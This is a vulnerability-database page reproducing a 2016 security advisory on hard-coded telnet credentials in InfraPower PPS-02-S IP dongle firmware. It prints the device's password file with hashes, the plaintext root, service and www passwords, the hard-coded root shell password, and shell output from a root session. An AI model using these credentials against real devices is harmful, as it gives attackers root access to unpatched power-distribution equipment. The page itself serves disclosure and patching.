Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

InfraPower PPS-02-S Q213V1 Hard-Coded Credentials Remote Root

🗓️ 30 Oct 2016 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 45 Views

InfraPower PPS-02-S Q213V1 Hard-Coded Credentials Remote Root Access on IP Dongle Firmwar

Code
`  
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access  
  
  
Vendor: Austin Hughes Electronics Ltd.  
Product web page: http://www.austin-hughes.com  
Affected version: Q213V1 (Firmware: V2395S)  
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)  
  
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each  
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.  
Patented IP Dongle provides IP remote access to the PDUs by a true  
network IP address chain. Only 1xIP dongle allows access to max. 16  
PDUs in daisy chain - which is a highly efficient cient application  
for saving not only the IP remote accessories cost, but also the true  
IP addresses required on the PDU management.  
  
Desc: InfraPower suffers from a use of hard-coded credentials. The IP  
dongle firmware ships with hard-coded accounts that can be used to gain  
full system access (root) using the telnet daemon on port 23.  
  
Tested on: Linux 2.6.28 (armv5tel)  
lighttpd/1.4.30-devel-1321  
PHP/5.3.9  
SQLite/3.7.10  
  
  
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5371  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php  
  
  
27.09.2016  
  
--  
  
  
# cat /etc/passwd  
  
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh  
bin:x:1:1:bin:/bin:/bin/sh  
daemon:x:2:2:daemon:/usr/sbin:/bin/sh  
adm:x:3:4:adm:/adm:/bin/sh  
lp:x:4:7:lp:/var/spool/lpd:/bin/sh  
sync:x:5:0:sync:/bin:/bin/sync  
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh  
operator:x:11:0:Operator:/var:/bin/sh  
nobody:x:99:99:nobody:/home:/bin/sh  
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script  
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script  
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh  
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh  
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh  
  
# showing accounts in root group:  
  
Username: root  
Password: 8475  
--  
Username: service  
Password: ipdongle  
--  
Username: www  
Password: 9311  
--  
Username: www2  
Password: 9311  
  
# showing other less-privileged accounts:   
  
Username: user  
Password: 8475  
--  
Username: admin  
Password: 8475  
  
--------  
  
/mnt/mtd # echo $SHELL  
/sbin/root_shell.sh  
/mnt/mtd # cat /sbin/root_shell.sh   
#!/bin/sh  
trap "" 2 3 9 24  
  
# check login  
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`  
  
if [ "$passWork" = "1" ]; then  
login_file=/mnt/mtd/root_login  
now_timestamp=`date +%s`  
  
if [ -f $login_file ]; then  
line=`wc -l $login_file | cut -c 1-9`  
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then  
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`  
pre_result1=`echo $pre_login | cut -d " " -f 1`  
pre_result2=`echo $pre_login | cut -d " " -f 2`  
pre_result3=`echo $pre_login | cut -d " " -f 3`  
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then  
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`  
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`  
if [ "$result" != "success" ]; then  
echo $result  
exit 0  
fi  
fi  
fi  
fi  
  
echo -n "password:"  
read pass  
if [ "$pass" != "999" ]; then  
echo "wrong password"  
echo fail $now_timestamp >> $login_file  
exit 0  
fi  
echo success $now_timestamp >> $login_file  
fi  
  
/bin/sh  
/mnt/mtd #   
  
--------  
  
/mnt/mtd # ls  
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf  
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf  
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log  
  
--------  
  
/mnt/mtd # df -h  
  
Filesystem Size Used Available Use% Mounted on  
tmpfs 256.0M 4.0K 256.0M 0% /tmp  
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd  
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1  
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2  
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3  
  
--------  
  
/www # ls -al  
  
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .  
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..  
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php  
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php  
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php  
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php  
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php  
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General  
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php  
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript  
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php  
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php  
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php  
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php  
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php  
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php  
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php  
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php  
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php  
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php  
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php  
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php  
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php  
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php  
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php  
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php  
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php  
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php  
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php  
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php  
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php  
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php  
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php  
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php  
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php  
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php  
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php  
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php  
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php  
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh  
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php  
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php  
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2016 00:00Current
7.4High risk
Vulners AI Score7.4
infrapowerhard-coded credentialsremote root access
45